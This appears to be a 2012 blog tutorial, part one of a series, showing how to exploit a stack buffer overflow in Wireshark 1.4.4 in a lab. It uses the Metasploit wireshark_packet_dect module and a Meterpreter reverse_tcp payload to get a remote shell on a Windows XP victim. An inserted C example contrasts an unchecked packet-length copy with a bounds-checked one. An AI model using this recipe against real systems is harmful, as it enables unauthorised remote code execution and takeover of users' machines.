Wireshark Stack Buffer Overflow (Remote) Exploitation and Prevention Part-I

Feb 02, 2012 07:49 AM

What is Wireshark?

 
Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.
 
Wireshark is cross-platform, using the GTK+ widget toolkit to implement its user interface, and using pcap to capture packets; it runs on various Unix-like operating systems including Linux, Mac OS X, BSD, and Solaris, and on Microsoft Windows. There is also a terminal-based (non-GUI) version called TShark. Wireshark, and the other programs distributed with it such as TShark, are free software, released under the terms of the GNU General Public License.
 
 
Wireshark 1.4.4 Stack Buffer Overflow
 
This module exploits a stack buffer overflow in Wireshark <= 1.4.4. When a malicious .pcap file is opened in Wireshark, a stack buffer overflow occurs, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR and works on XP, Vista & Windows 7.
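As an added illustration (not Wireshark's own code and not the Metasploit module), the pattern behind this class of bug: a length read from the packet bytes drives a copy into a fixed-size stack buffer, shown beside the bounds-checked form a dissector should use. The function names, buffer size and sample packets are constructed for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed dissector-style code for illustration only. A one-byte length
 * field taken from the packet decides how much is copied into a fixed-size
 * stack buffer; that is the classic stack buffer overflow shape. */
#define FIELD_MAX 16

/* Vulnerable pattern: trusts the on-the-wire length. Never call this with a
 * length byte above FIELD_MAX; the copy would run past the stack buffer. */
int parse_field_unchecked(const uint8_t *pkt, size_t pkt_len) {
    uint8_t field[FIELD_MAX];
    if (pkt_len < 1) return -1;
    size_t len = pkt[0];
    memcpy(field, pkt + 1, len);          /* no bound against FIELD_MAX */
    return (int)len;
}

/* Hardened pattern: the attacker-controlled length is checked against both
 * the destination buffer and the bytes actually remaining in the packet,
 * and a malformed packet is rejected instead of copied. */
int parse_field_checked(const uint8_t *pkt, size_t pkt_len) {
    uint8_t field[FIELD_MAX];
    if (pkt_len < 1) return -1;
    size_t len = pkt[0];
    if (len > FIELD_MAX || len > pkt_len - 1) {
        return -1;                        /* malformed: reject, do not copy */
    }
    memcpy(field, pkt + 1, len);
    return (int)len;
}

int main(void) {
    /* Constructed sample packets: a well-formed one, and a malformed one whose
     * length byte (0x40 = 64) exceeds the 16-byte stack buffer. */
    uint8_t good[] = {0x04, 'D', 'E', 'C', 'T'};
    uint8_t bad[1 + 64];
    memset(bad, 'A', sizeof bad);
    bad[0] = 0x40;
    printf("good packet: checked parser returns %d\n",
           parse_field_checked(good, sizeof good));
    printf("bad packet:  checked parser returns %d (rejected)\n",
           parse_field_checked(bad, sizeof bad));
    return 0;
}
```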
 
Exploitation Of Wireshark Stack Buffer Overflow
 
1) Our victim is using Windows XP Professional SP3, and its IP address is 192.168.42.78.
 
 
2) Our victim is using a fully patched operating system.
 
 
3) Our victim also has Symantec Endpoint Protection 12 installed, and it is fully updated.
 
 
4) Wireshark 1.4.4 is also installed on our victim machine.
 
 
5) I am using BackTrack 5 R1 as the attacker machine, and its IP address is 192.168.42.62.
 
6) Our victim is using Wireshark to capture packets.
 
 
7) I am using the exploit/windows/misc/wireshark_packet_dect Metasploit module for the Wireshark stack buffer overflow. Type show options and hit Enter.
 
 
8) I have to specify the interface of the machine through which I am connected to the network.
 
 
9) I am using the windows/meterpreter/reverse_tcp payload.
 
 
10) Now I have to enter LHOST (local host), i.e. 192.168.42.62 (the attacker machine's IP address).
 
 
11) Type exploit and hit Enter. Our exploit and payload execute successfully on the victim machine, and the attacker gets a Meterpreter session on the victim machine.
 
 
 
12) Let's type the ipconfig command to verify whether we have got into the victim machine or not.
 
 
Note: This attack doesn't always succeed; if no one on the network is using Wireshark to capture data, your exploit will return an error message.
 
In the second part I will show you how to prevent the Wireshark stack buffer overflow vulnerability with Symantec Critical System Protection (SCSP).
